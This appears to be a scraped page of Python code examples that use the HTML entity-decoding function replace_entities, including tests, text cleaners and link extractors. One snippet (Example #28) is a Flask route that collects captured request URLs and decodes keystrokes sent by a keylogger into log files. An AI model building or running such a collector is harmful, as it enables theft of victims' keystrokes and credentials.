def extract_regex(regex, text, encoding='utf-8'):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract" that will be returned
    * if the regex contains multiple numbered groups, all those will be returned (flattened)
    * if the regex doesn't contain any group the entire regex matching is returned
    """
    warnings.warn(
        "scrapy.utils.misc.extract_regex has moved to parsel.utils.extract_regex.",
        ScrapyDeprecationWarning,
        stacklevel=2
    )

    if isinstance(regex, str):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group('extract')]   # named group
    except Exception:
        strings = regex.findall(text)    # full regex or numbered groups
    strings = flatten(strings)

    if isinstance(text, str):
        return [replace_entities(s, keep=['lt', 'amp']) for s in strings]
    else:
        return [replace_entities(to_unicode(s, encoding), keep=['lt', 'amp'])
                for s in strings]
Example #2
0
 def test_regular(self):
     # regular conversions
     self.assertEqual(replace_entities(u'As low as £100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities(b'As low as £100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities('redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL & SEASONAL-_-MR0221Y-_-9-carat gold ½oz solid crucifix pendant'),
                      u'redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL & SEASONAL-_-MR0221Y-_-9-carat gold \xbdoz solid crucifix pendant')
Example #3
0
 def test_regular(self):
     # regular conversions
     self.assertEqual(replace_entities(u'As low as £100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities(b'As low as £100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities('redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL & SEASONAL-_-MR0221Y-_-9-carat gold ½oz solid crucifix pendant'),
                      u'redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL & SEASONAL-_-MR0221Y-_-9-carat gold \xbdoz solid crucifix pendant')
Example #4
0
 def test_returns_unicode(self):
     # make sure it always return uncode
     assert isinstance(replace_entities(b'no entities'), six.text_type)
     assert isinstance(replace_entities(b'Price: £100!'),
                       six.text_type)
     assert isinstance(replace_entities(u'no entities'), six.text_type)
     assert isinstance(replace_entities(u'Price: £100!'),
                       six.text_type)
Example #5
0
 def test_illegal_entities(self):
     self.assertEqual(replace_entities('a < b &illegal; c � six', remove_illegal=False),
                      u'a < b &illegal; c &#12345678; six')
     self.assertEqual(replace_entities('a &lt; b &illegal; c &#12345678; six', remove_illegal=True),
                      u'a < b  c  six')
     self.assertEqual(replace_entities('x&#x2264;y'), u'x\u2264y')
     self.assertEqual(replace_entities('x&#157;y'), u'xy')
     self.assertEqual(replace_entities('x&#157;y', remove_illegal=False), u'x&#157;y')
Example #6
0
 def test_illegal_entities(self):
     self.assertEqual(
         replace_entities('a &lt; b &illegal; c &#12345678; six',
                          remove_illegal=False),
         u'a < b &illegal; c &#12345678; six')
     self.assertEqual(
         replace_entities('a &lt; b &illegal; c &#12345678; six',
                          remove_illegal=True), u'a < b  c  six')
     self.assertEqual(replace_entities('x&#x2264;y'), u'x\u2264y')
Example #7
0
 def test_missing_semicolon(self):
     for entity, result in (
         (
             '&lt&lt!',
             '<<!',
         ),
         (
             '&LT!',
             '<!',
         ),
         (
             '&#X41 ',
             'A ',
         ),
         (
             '&#x41!',
             'A!',
         ),
         (
             '&#x41h',
             'Ah',
         ),
         (
             '&#65!',
             'A!',
         ),
         (
             '&#65x',
             'Ax',
         ),
         (
             '&sup3!',
             '\u00B3!',
         ),
         (
             '&Aacute!',
             '\u00C1!',
         ),
         (
             '&#9731!',
             '\u2603!',
         ),
         (
             '&#153',
             '\u2122',
         ),
         (
             '&#x99',
             '\u2122',
         ),
     ):
         self.assertEqual(replace_entities(entity, encoding='cp1252'),
                          result)
         self.assertEqual(
             replace_entities('x%sy' % entity, encoding='cp1252'),
             'x%sy' % result)
Example #8
0
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(
         replace_entities(b'<b>Low &lt; High &amp; Medium &pound; six</b>',
                          keep=['lt', 'amp']),
         '<b>Low &lt; High &amp; Medium \xa3 six</b>')
     self.assertEqual(
         replace_entities('<b>Low &lt; High &amp; Medium &pound; six</b>',
                          keep=['lt', 'amp']),
         '<b>Low &lt; High &amp; Medium \xa3 six</b>')
Example #9
0
 def test_missing_semicolon(self):
     for entity, result in (
         (
             "&lt&lt!",
             "<<!",
         ),
         (
             "&LT!",
             "<!",
         ),
         (
             "&#X41 ",
             "A ",
         ),
         (
             "&#x41!",
             "A!",
         ),
         (
             "&#x41h",
             "Ah",
         ),
         (
             "&#65!",
             "A!",
         ),
         (
             "&#65x",
             "Ax",
         ),
         (
             "&sup3!",
             "\u00B3!",
         ),
         (
             "&Aacute!",
             "\u00C1!",
         ),
         (
             "&#9731!",
             "\u2603!",
         ),
         (
             "&#153",
             "\u2122",
         ),
         (
             "&#x99",
             "\u2122",
         ),
     ):
         self.assertEqual(replace_entities(entity, encoding="cp1252"), result)
         self.assertEqual(
             replace_entities(f"x{entity}y", encoding="cp1252"), f"x{result}y"
         )
Example #10
0
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(
         replace_entities(b"<b>Low &lt; High &amp; Medium &pound; six</b>",
                          keep=["lt", "amp"]),
         "<b>Low &lt; High &amp; Medium \xa3 six</b>",
     )
     self.assertEqual(
         replace_entities("<b>Low &lt; High &amp; Medium &pound; six</b>",
                          keep=["lt", "amp"]),
         "<b>Low &lt; High &amp; Medium \xa3 six</b>",
     )
Example #11
0
 def test_illegal_entities(self):
     self.assertEqual(
         replace_entities("a &lt; b &illegal; c &#12345678; six",
                          remove_illegal=False),
         "a < b &illegal; c &#12345678; six",
     )
     self.assertEqual(
         replace_entities("a &lt; b &illegal; c &#12345678; six",
                          remove_illegal=True),
         "a < b  c  six",
     )
     self.assertEqual(replace_entities("x&#x2264;y"), "x\u2264y")
     self.assertEqual(replace_entities("x&#157;y"), "xy")
     self.assertEqual(replace_entities("x&#157;y", remove_illegal=False),
                      "x&#157;y")
Example #12
0
 def clean_url(url):
     clean_url = ''
     try:
         clean_url = urljoin(base_url, replace_entities(clean_link(url.decode(response_encoding))))
     except ValueError:
         pass
     return clean_url
Example #13
0
    def process(self, data, url_object):
        """Process HTML data.

        Replaces entities and removes tags (except comments) before
        processing with TextProcessor.
        """
        logging.info("Process HTML %s" % url_object.url)
        try:
            encoding, data = get_codec_and_string(data)
            # Remove style tags to avoid false positives from inline styles
            data = remove_tags_with_content(data, which_ones=('style',))
        except UnicodeDecodeError as ude:
            logging.error('UnicodeDecodeError in handle_error_method: {}'.format(ude))
            logging.error('Error happened for file: {}'.format(url_object.url))
            return False

        # Convert HTML entities to their unicode representation
        entity_replaced_html = replace_entities(data)

        # Collapse whitespace (including newlines), since extra whitespace is
        # not significant in HTML (except inside comment tags)
        collapsed_html = _whitespace_re.sub(' ', entity_replaced_html)

        # Replace tags with <> character to make sure text processor
        # doesn't match across tag boundaries.
        replace_tags_text = _html_tag_re.sub('<>', collapsed_html)

        return self.text_processor.process(replace_tags_text, url_object)
def remove_garbage(val):
    val = replace_escape_chars(val)
    val = replace_entities(val)
    val = re.sub(r'\.', '. ', val)
    val = re.sub(r'\s+,\s{2,}', ', ', val)
    val = re.sub(r'\s{2,}', ' ', val)
    return val.strip()
Example #15
0
def normalize_web_content(x, keep=('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'strong'),
                          token='____SECTION____'):
    """Normalize web content.

    Parameters
    ----------
    keep : tuple
        HTML tags to keep.
    token : str or None
        Token to use for replacing kep HTML tags.
        Do not replace if `None`.
    """
    try:
        x = strip_html5_whitespace(x)
        x = remove_comments(x)
        x = remove_tags(x, keep=keep)
        if token:
            x = replace_tags(x, token=token)
        x = replace_entities(x)
        x = replace_escape_chars(x)
    except (TypeError, AttributeError):
        pass
    for part in _rx_web_sectionize.split(x):
        if part:
            yield part
Example #16
0
def clearText(inputTextFile, outputTextFile, outputErr):
    input = open(inputTextFile, 'rb')
    sc = chardet.detect(input.read())
    input.close()
    #print(inputTextFile,sc)
    # if sc["encoding"] != None:
    #     outputErr.write(path+"\n")
    if sc["encoding"] != None and sc["confidence"] > 0.5:
        input = open(inputTextFile, 'r', encoding=sc["encoding"])
        output = open(outputTextFile, 'w', encoding="utf-8")
        try:
            text = input.read()
        except Exception as e:
            print(e)
            outputErr = open("C:\\ErrorFiles.log", 'a', encoding="utf-8")
            outputErr.write(inputTextFile + " | " + outputTextFile + "\n")
            outputErr.close()
            return
        text = replace_entities(text)
        PUNCTUATION = ''  #u'…»«—№’'
        RU_ALPHABET = u'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдеёжзийклмнопрстуфхцчшщъыьэюя'
        final_new_text = re.sub(
            "[^{}]+".format(printable + PUNCTUATION + RU_ALPHABET), "", text)
        final_new_text = re.sub(r'\s+', ' ', final_new_text)
        for c in list(PUNCTUATION):
            final_new_text.replace(c, ' ' + c + ' ')
        final_new_text.replace(u'\xa0', ' ')
        output.write(final_new_text)
        output.close()
        input.close()
    else:
        outputErr.write(inputTextFile + "\n")
Example #17
0
def text(region):
    """Converts HTML to text. There is no attempt at formatting other than
    removing excessive whitespace,

    For example:
    >>> t = lambda s: text(htmlregion(s))
    >>> t(u'<h1>test</h1>')
    u'test'

    Leading and trailing whitespace are removed
    >>> t(u'<h1> test</h1> ')
    u'test'

    Comments are removed
    >>> t(u'test <!-- this is a comment --> me')
    u'test me'

    Text between script tags is ignored
    >>> t(u"scripts are<script>n't</script> ignored")
    u'scripts are ignored'

    HTML entities are converted to text
    >>> t(u"only &pound;42")
    u'only \\xa342'

    >>> t(u"<p>The text</p><?xml:namespace blabla/><p>is here</p>")
    u'The text is here'
    """
    text = replace_entities(region.text_content, encoding=region.htmlpage.encoding)
    return _WS.sub(u' ', text).strip()
def queryPreprocessing(query, args):
    # regular expressions
    p_tag_comment = re.compile(r'(<.*?>|<!--.*-->)')
    p_alpha_digit = re.compile(r'\b([a-z]+)-([0-9]+)\b', re.I)
    p_digit_alpha = re.compile(r'\b([0-9]+)-([a-z]+)\b', re.I)
    p_dot_acronym = re.compile(r'\b([a-z]+\.)+[a-z]+(\.|\b)', re.I)
    p_date = re.compile(
        r"""\b
		([0-9]{1,2}/[0-9]{1,2}/[0-9]{2,4})
		|([0-9]{1,2}-[0-9]{1,2}-[0-9]{2,4})
		|(((Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)[.]?
		|January|February|March|April|May|June|July|August
		|September|October|November|December)
		\ [0-9]{1,2}(st|nd|rd|th)?,\ [0-9]{2,4})
	 	\b""", re.VERBOSE | re.I)
    p_docno = re.compile(r'(?:<DOCNO>\s*)(.+)(?:\s*</DOCNO>)', re.I)
    p_num1 = re.compile(r',([0-9]{3})')
    p_num2 = re.compile(r'\b(\d+)[.]0+\b')
    p_file_extension = re.compile(
        r'([^\\\/:*?\"<>|\s]+)\.(aif|cda|mid|midi|mp3|mpa|ogg|wav|wma|wpl|7z|arj|deb|pkg|rar|rpm|tar\.gz|z|zip|bin|dmg|iso|toast|vcd|csv|dat|db|dbf|log|mdb|sav|sql|tar|xml|apk|bat|bin|cgi|pl|com|exe|gadget|jar|py|wsf|fnt|fon|otf|ttf|ai|bmp|gif|ico|jpeg|jpg|png|ps|psd|svg|tif|tiff|asp|aspx|cer|cfm|css|htm|html|js|jsp|part|php|rss|xhtml|key|odp|pps|ppt|pptx|class|cpp|cs|h|java|sh|swift|vb|ods|xlr|xls|xlsx|bak|cab|cfg|cpl|cur|dll|dmp|drv|icns|ico|ini|lnk|msi|sys|tmp|3g2|3gp|avi|flv|h264|m4v|mkv|mov|mp4|mpg|mpeg|rm|swf|vob|wmv|doc|docx|odt|pdf|rtf|tex|txt|wks|wps|wpd)',
        re.I)
    p_prefix = re.compile(
        r'\b(a|an|ante|anti|auto|circum|co|com|con|contra|contro|de|dis|en|em|ex|extra|fore|hetero|h**o|homeo|hyper|il|im|in|ir|inter|intra|intro|macro|micro|mid|mis|mono|non|omni|over|post|pre|pro|re|semi|sub|super|sym|syn|trans|tri|un|under|uni)-([a-z])+\b',
        re.I)
    p_hyphen = re.compile(r'\b(\w+-)+\w+\b')

    # create a porter stemmer
    stemmer = PorterStemmer()
    # convert all character references (e.g. &gt;, &#62;, &x3e;) to unicode
    query = replace_entities(query)
    query = html.unescape(query)
    # some queries have '/', need to be handled specifically
    query = query.replace('/', ' / ')
    # convert to lower case
    query = query.lower()
    # expand file extension
    query = p_file_extension.sub(r'\g<1>\g<2> \g<2>', query)
    # ph.D. -> phd
    query = p_dot_acronym.sub(dotAcronym, query)
    # convert date to mm/dd/yyyy format or remove it if invalid
    query = p_date.sub(dateReplace, query)
    # digit format
    query = p_num1.sub(r'\g<1>', query)  # remove ',' in 1,000
    query = p_num2.sub(r'\g<1>', query)  # remove '.00' in 1.00
    # expand digit-alpha format
    query = p_digit_alpha.sub(digitAlpha, query)
    # expand alpha-digit format
    query = p_alpha_digit.sub(alphaDigit, query)
    # expand stem with hyphen prefix
    query = p_prefix.sub(prefixReplace, query)
    # expand hyphenated word
    query = p_hyphen.sub(hyphenReplace, query)
    # tokenize query
    query = nltk.word_tokenize(query)
    # apply Porter Stemmer
    if args.index_type == 'stem':
        query = [stemmer.stem(word) for word in query]
    # remove term not in idx_table (value will be 0 for all retrieval)
    query = [x for x in query if x in idx_table]
    return query
Example #19
0
def make_table():
    items = []

    for obj in obj_location_list:
        items.append(Item(obj.total_time))

    # Populate the table
    table = ItemTable(items)

    table_html = str(table.__html__().replace("<table>",
                                              '<table class="table">'))
    # print(table_html)
    table_html = replace_entities(table_html)

    # counter1 = count(1)
    # table_html = re.sub('data-target="#demo', lambda m: m.group() + str(next(counter1)), table_html)

    # table_html = table_html.replace("</td></tr>", '</td></tr> <tr> <td colspan="6" class="hiddenRow"style="padding:0!important;"><div class="accordian-body collapse" id="demo"> <ul class="list-group"> [cmmt] </ul> </div></td></tr>')
    # counter2 = count(1)
    # table_html = re.sub('id="demo', lambda m: m.group() + str(next(counter2)), table_html)
    # for key, value in theme_dict.items():
    #     for sub_theme in value:
    #         table_html = table_html.replace('[cmmt]', get_cmmts(sub_theme.theme, theme_dict),1)
    # g.theme_dict = result_list

    return table_html
Example #20
0
def text(region):
    """Converts HTML to text. There is no attempt at formatting other than
    removing excessive whitespace,

    For example:
    >>> t = lambda s: text(htmlregion(s))
    >>> t(u'<h1>test</h1>')
    u'test'

    Leading and trailing whitespace are removed
    >>> t(u'<h1> test</h1> ')
    u'test'

    Comments are removed
    >>> t(u'test <!-- this is a comment --> me')
    u'test me'

    Text between script tags is ignored
    >>> t(u"scripts are<script>n't</script> ignored")
    u'scripts are ignored'

    HTML entities are converted to text
    >>> t(u"only &pound;42")
    u'only \\xa342'

    >>> t(u"<p>The text</p><?xml:namespace blabla/><p>is here</p>")
    u'The text is here'
    """
    text = replace_entities(region.text_content, encoding=region.htmlpage.encoding)
    return _WS.sub(u' ', text).strip()
 def clean_url(url):
     clean_url = ''
     try:
         clean_url = urljoin(base_url, replace_entities(clean_link(url.decode(response_encoding))))
     except ValueError:
         pass
     return clean_url
Example #22
0
def replace_all_entities(string):
    """ replace all XML entities, even poorly encoded """
    # hack because BGG encodes 'Ü' as '&amp;#195;&amp;#156;' (d'oh!)
    # note that this may corrupt text that's actually encoded correctly!
    return replace_entities(
        replace_utf_entities(
            string.replace("&amp;", "&").replace("&amp;",
                                                 "&").replace("&amp;", "&")))
Example #23
0
def clean_text(text):
    """Clean text from tags, replace entities and normalize whitespaces"""
    text = remove_tags(text)
    text = replace_entities(text)
    # Normalize whitespace
    text = re.sub(r'(\s)+', '\\1', text)
    # Strip whitespace
    return text.strip()
Example #24
0
 def test_missing_semicolon(self):
     for entity, result in (
             ('&lt&lt!', '<<!',),
             ('&LT!', '<!',),
             ('&#X41 ', 'A ',),
             ('&#x41!', 'A!',),
             ('&#x41h', 'Ah',),
             ('&#65!', 'A!',),
             ('&#65x', 'Ax',),
             ('&sup3!', u'\u00B3!',),
             ('&Aacute!', u'\u00C1!',),
             ('&#9731!', u'\u2603!',),
             ('&#153', u'\u2122',),
             ('&#x99', u'\u2122',),
             ):
         self.assertEqual(replace_entities(entity, encoding='cp1252'), result)
         self.assertEqual(replace_entities('x%sy' % entity, encoding='cp1252'), u'x%sy' % result)
Example #25
0
 def re(self, regex):
     if isinstance(regex, types.StringTypes):
         regex = re.compile(regex, re.UNICODE)
     text = self.extract()
     try:
         lst = [regex.search(text).group('extract')]
     except:
         lst = regex.findall(text)
     return [replace_entities(s, keep=['lt', 'amp']) for s in flatten(lst)]
Example #26
0
def sanitize(iterable):
    # TODO change name and add other options

    iterable = (x.strip() for x in iterable)
    iterable = (re.sub(r'[\n\t\r\s]+', ' ', x) for x in iterable)
    iterable = (x.encode('ascii', errors='ignore').decode('ascii') for x in iterable)
    iterable = (replace_entities(x) for x in iterable)
    iterable = (remove_tags(x) for x in iterable)
    return iterable
Example #27
0
def sanitize(iterable):
    # TODO change name and add other options

    iterable = (x.strip() for x in iterable)
    iterable = (re.sub(r'[\n\t\r\s]+', ' ', x) for x in iterable)
    iterable = (unidecode(x) for x in iterable)
    iterable = (replace_entities(x) for x in iterable)
    iterable = (remove_tags(x) for x in iterable)
    return iterable
Example #28
0
def route():
    """Get all GET requests and dump them to logs."""
    # Unescape HTML and write to log.
    with open("cap.log", "a") as f:
        f.write(replace_entities(str(request.url)) + "\n")

    # If we think a keylogger (param: 'c') is trying to get us information...
    with open("key.log", "a") as f:
        if "c" in request.args:
            keys = loads(replace_entities(request.args.get('c')))

            # From the JSON list get only keys pressed. If impossible, stop.
            try:
                keys = "".join(keys)
                f.write(keys + '\n')
            except Exception:
                pass

    return message
Example #29
0
def clean_text(text):

    # Helper function to clean text data and remove non-printable chars.

    text = text.strip()
    text = re.sub(r'[\n\t\r\s]+', ' ', text)
    text = text.encode('ascii', errors='ignore').decode('ascii')
    text = replace_entities(text)
    text = remove_tags(text)
    return text
Example #30
0
def extract_raw_text(html):
    text = replace_entities(html)
    text = re_clean_blanks.sub(u' ', text)
    text = re_clean_comments.sub(u' ', text)
    text = re_clean_javascript.sub(u' ', text)
    text = re_clean_style.sub(u' ', text)
    text = re_clean_balises.sub(u' ', text)
    text = re_clean_blanks.sub(u' ', text).strip()
    text = re_clean_multiCR.sub(u'\n', text)
    return text
Example #31
0
def extract_raw_text(html):
    text = replace_entities(html)
    text = re_clean_blanks.sub(u' ', text)
    text = re_clean_comments.sub(u' ', text)
    text = re_clean_javascript.sub(u' ', text)
    text = re_clean_style.sub(u' ', text)
    text = re_clean_balises.sub(u' ', text)
    text = re_clean_blanks.sub(u' ', text).strip()
    text = re_clean_multiCR.sub(u'\n', text)
    return text
Example #32
0
def clean_file(file_name, fields):
    res = []
    with jsonlines.open(file_name) as rdr:
        for line in rdr:
            for f in fields:
                if not line[f]:
                    continue
                line[f] = replace_entities(line[f].replace("\n", "").strip())
            res.append(copy.deepcopy(line))
    return res
Example #33
0
def clean_text(text):
    """Clean text from tags, replace entities and normalize whitespaces"""
    if not isinstance(text, six.string_types):
        return text
    text = remove_tags(text)
    text = replace_entities(text)
    # Normalize whitespace
    text = re.sub(r'(\s)+', '\\1', text)
    # Strip whitespace
    return text.strip()
Example #34
0
def image_url(txt):
    """convert text to a url

    this is quite conservative, since relative urls are supported
    Example:

        >>> image_url('')

        >>> image_url('   ')

        >>> image_url(' \\n\\n  ')

        >>> image_url('foo-bar.jpg')
        ['foo-bar.jpg']
        >>> image_url('/images/main_logo12.gif')
        ['/images/main_logo12.gif']
        >>> image_url("http://www.image.com/image.jpg")
        ['http://www.image.com/image.jpg']
        >>> image_url("http://www.domain.com/path1/path2/path3/image.jpg")
        ['http://www.domain.com/path1/path2/path3/image.jpg']
        >>> image_url("/path1/path2/path3/image.jpg")
        ['/path1/path2/path3/image.jpg']
        >>> image_url("path1/path2/image.jpg")
        ['path1/path2/image.jpg']
        >>> image_url("background-image : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background-image : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background-image : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80')
        ['http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80']
        >>> image_url('../image.aspx?thumb=true&amp;boxSize=175&amp;img=Unknoportrait[1].jpg')
        ['../image.aspx?thumb=true&boxSize=175&img=Unknoportrait%5B1%5D.jpg']
        >>> image_url('http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff')
        ['http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff']
        >>> image_url('http://www.site.com/image.php')
        ['http://www.site.com/image.php']
        >>> image_url('background-image:URL(http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&amp;defaultImage=noimage_wasserstrom)')
        ['http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&defaultImage=noimage_wasserstrom']

    """
    imgurl = extract_image_url(txt)
    return [safe_url_string(replace_entities(url(imgurl)))] if imgurl else None
Example #35
0
 def normalizeTool(cls, html):
     '''
     :param html: 需要去掉html代码的str字符串
     :return: 去掉html代码的字符串
     '''
     removeHtml = w3.replace_escape_chars(w3.replace_entities(
         w3.remove_tags(html)),
                                          replace_by=" ")
     # removeHtml = w3.replace_escape_chars(w3.replace_entities(w3.remove_tags(html)))
     removeEscapeChars = " ".join(removeHtml.split())
     return removeEscapeChars
Example #36
0
File: regex.py Project: 0326/scrapy
    def _extract_links(self, response_text, response_url, response_encoding, base_url=None):
        if base_url is None:
            base_url = urljoin(response_url, self.base_url) if self.base_url else response_url

        clean_url = lambda u: urljoin(base_url, replace_entities(clean_link(u.decode(response_encoding))))
        clean_text = lambda t: replace_escape_chars(remove_tags(t.decode(response_encoding))).strip()

        links_text = linkre.findall(response_text)
        return [Link(clean_url(url).encode(response_encoding),
                     clean_text(text))
                for url, _, text in links_text]
Example #37
0
def image_url(txt):
    """convert text to a url

    this is quite conservative, since relative urls are supported
    Example:

        >>> image_url('')

        >>> image_url('   ')

        >>> image_url(' \\n\\n  ')

        >>> image_url('foo-bar.jpg')
        ['foo-bar.jpg']
        >>> image_url('/images/main_logo12.gif')
        ['/images/main_logo12.gif']
        >>> image_url("http://www.image.com/image.jpg")
        ['http://www.image.com/image.jpg']
        >>> image_url("http://www.domain.com/path1/path2/path3/image.jpg")
        ['http://www.domain.com/path1/path2/path3/image.jpg']
        >>> image_url("/path1/path2/path3/image.jpg")
        ['/path1/path2/path3/image.jpg']
        >>> image_url("path1/path2/image.jpg")
        ['path1/path2/image.jpg']
        >>> image_url("background-image : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background-image : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background-image : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80')
        ['http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80']
        >>> image_url('../image.aspx?thumb=true&amp;boxSize=175&amp;img=Unknoportrait[1].jpg')
        ['../image.aspx?thumb=true&boxSize=175&img=Unknoportrait[1].jpg']
        >>> image_url('http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff')
        ['http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff']
        >>> image_url('http://www.site.com/image.php')
        ['http://www.site.com/image.php']
        >>> image_url('background-image:URL(http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&amp;defaultImage=noimage_wasserstrom)')
        ['http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&defaultImage=noimage_wasserstrom']

    """
    imgurl = extract_image_url(txt)
    return [safe_url_string(replace_entities(url(imgurl)))] if imgurl else None
Example #38
0
def extract_regex(regex, text, encoding="utf-8"):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract" that will be returned
    * if the regex contains multiple numbered groups, all those will be returned (flattened)
    * if the regex doesn't contain any group the entire regex matching is returned
    """

    if isinstance(regex, six.string_types):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group("extract")]  # named group
    except:
        strings = regex.findall(text)  # full regex or numbered groups
    strings = flatten(strings)

    if isinstance(text, six.text_type):
        return [replace_entities(s, keep=["lt", "amp"]) for s in strings]
    else:
        return [replace_entities(to_unicode(s, encoding), keep=["lt", "amp"]) for s in strings]
def extract_regex(regex, text, encoding='utf-8'):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract" that will be returned
    * if the regex contains multiple numbered groups, all those will be returned (flattened)
    * if the regex doesn't contain any group the entire regex matching is returned
    """

    if isinstance(regex, basestring):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group('extract')]   # named group
    except:
        strings = regex.findall(text)    # full regex or numbered groups
    strings = flatten(strings)
    #flatten 把列表中的列表或者字典等嵌套结构去除,返回一个统一的列表。
    if isinstance(text, unicode):
        return [replace_entities(s, keep=['lt', 'amp']) for s in strings]
    else:
        return [replace_entities(unicode(s, encoding), keep=['lt', 'amp']) for s in strings]
Example #40
0
    def parse_item(self, response):
        links = dict()
        link_titles = set()

        url = response.url.split('#')[0].lower()
        url_head = url.split('/pages/')[0] + '/pages/'

        title = response.xpath('//meta[@name="DC.title"]/@content').extract_first()
        if title and title.endswith('- NHS Choices'):
            title = title.rstrip(' NHS Choices').rstrip(' -')
        subjects = response.xpath('//meta[@name="DC.Subject"][@scheme="NHSC.Ontology"]/@content').extract_first().split(', ')
        subjects = [s.lower() for s in subjects if s]
        if not subjects:
            subjects = [title.lower()]
        description = clean_text(response.xpath('//meta[@name="DC.description"]/@content').extract_first())
        raw_page_content = response.xpath('//div[@class="main-content healthaz-content clear"]/.').extract_first()
        page_content = clean_text(replace_entities(remove_tags(raw_page_content)))
        for a in response.xpath('//div[@class="main-content healthaz-content clear"]/descendant::a'):
            label = a.xpath('text()').extract_first()
            href = a.xpath('@href').extract_first()
            if href and label:
                href = self.base_url + href.lstrip('/')
                href = href.lower()
                label = clean_text(label)
                if '/conditions/' in href and url_head not in href:
                    link_titles.add(label)
                    if href in links:
                        links[href]['count'] += 1
                    else:
                        links[href] = {
                            'count': 1,
                            'label': label
                        }
                if url_head in href and href != url:
                    print("********************", href)
                    yield scrapy.Request(href, self.parse_item)

        article = NhsItem()
        article['url'] = url
        article['title'] = title
        article['subjects'] = subjects
        article['description'] = description
        article['page_content'] = str(page_content)
        article['links'] = links
        article['link_titles'] = list(link_titles)
        yield article
Example #41
0
def _has_ajaxcrawlable_meta(text):
    """
    >>> _has_ajaxcrawlable_meta('<html><head><meta name="fragment"  content="!"/></head><body></body></html>')
    True
    >>> _has_ajaxcrawlable_meta("<html><head><meta name='fragment' content='!'></head></html>")
    True
    >>> _has_ajaxcrawlable_meta('<html><head><!--<meta name="fragment"  content="!"/>--></head><body></body></html>')
    False
    >>> _has_ajaxcrawlable_meta('<html></html>')
    False
    """

    # Stripping scripts and comments is slow (about 20x slower than
    # just checking if a string is in text); this is a quick fail-fast
    # path that should work for most pages.
    if 'fragment' not in text:
        return False
    if 'content' not in text:
        return False

    text = html.remove_tags_with_content(text, ('script', 'noscript'))
    text = html.replace_entities(text)
